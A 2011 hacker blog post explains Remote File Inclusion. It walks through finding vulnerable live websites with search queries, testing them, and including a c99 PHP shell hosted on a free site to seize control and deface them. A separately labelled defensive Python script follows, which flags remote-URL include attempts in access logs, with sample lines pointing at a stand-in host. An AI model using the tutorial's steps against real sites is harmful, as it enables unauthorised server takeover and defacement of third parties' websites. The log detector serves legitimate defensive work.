Posted by Hacker Pilu Saturday, July 09, 2011
A Remote File Inclusion (RFI) vulnerability is where we trick the web server into putting our file (file uploader / PHP shell) into the web page. The server then parses our PHP script, and we then have full control over the server. The exploit works because the website calls another page to be displayed, except we edit the URL so that the website thinks our shell is the page to display.
Normally, I'm against stuff like this. I believe people should find their own vulnerable sites. But, for the sake of this paper, I will show you how we can use Google to get us vulnerable sites.
We will query Google like so:
This query asks Google to give us any page with index.php?page= in the URL. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter http://www.google.com after the equals sign.
Not every site will respond to this test. Only those that have the security hole will redirect to Google.
If the full google.com website appears on the page, the website is vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of an RFI:
This is an example only. There is no such site or file.
1. Get a free host website (like ByetHost or free webs)
2. Put a PHP shell (c99) in text form on the site
3. Insert the path to the shell in the vulnerable host's URL, like the example above.
4. You can then proceed to deface the site etc.
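Seen from the server side, the request pattern described above (a full URL placed after `page=`) stands out in web server access logs. The following detection sketch is an added example, not part of the original post; it assumes Common Log Format entries, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a URL scheme or is protocol-relative.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*://|//)', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, e.g. %2568ttp -> %68ttp -> http."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_params(log_line):
    """Return [(param, decoded_value)] for query parameters holding a remote URL."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    # parse_qsl decodes once; fully_decode handles values encoded more than once.
    decoded = [(name, fully_decode(value))
               for name, value in parse_qsl(query, keep_blank_values=True)]
    return [(name, value) for name, value in decoded if REMOTE_RE.match(value)]


def scan(lines):
    """Return (client_ip, param, value) for every request that needs review."""
    return [(line.split()[0], name, value)
            for line in lines
            for name, value in remote_include_params(line)]


# Constructed sample access-log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jul/2011:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Jul/2011:10:00:07 +0000] "GET /index.php?page=http://www.google.com HTTP/1.1" 200 48211',
    '203.0.113.9 - - [09/Jul/2011:10:00:15 +0000] "GET /index.php?page=hTTp%3A%2F%2Fhost.example%2Fs.txt HTTP/1.1" 200 911',
    '203.0.113.9 - - [09/Jul/2011:10:00:21 +0000] "GET /index.php?page=%2568ttp://host.example/s.txt HTTP/1.1" 200 911',
    '198.51.100.4 - - [09/Jul/2011:10:01:02 +0000] "GET /index.php?page=contact&ref=news HTTP/1.1" 200 4003',
]

if __name__ == "__main__":
    for ip, name, value in scan(SAMPLE_LOG):
        print(f"{ip} {name}={value}")
```

A hit records an attempt only; whether the page was actually included depends on how the application handles the parameter.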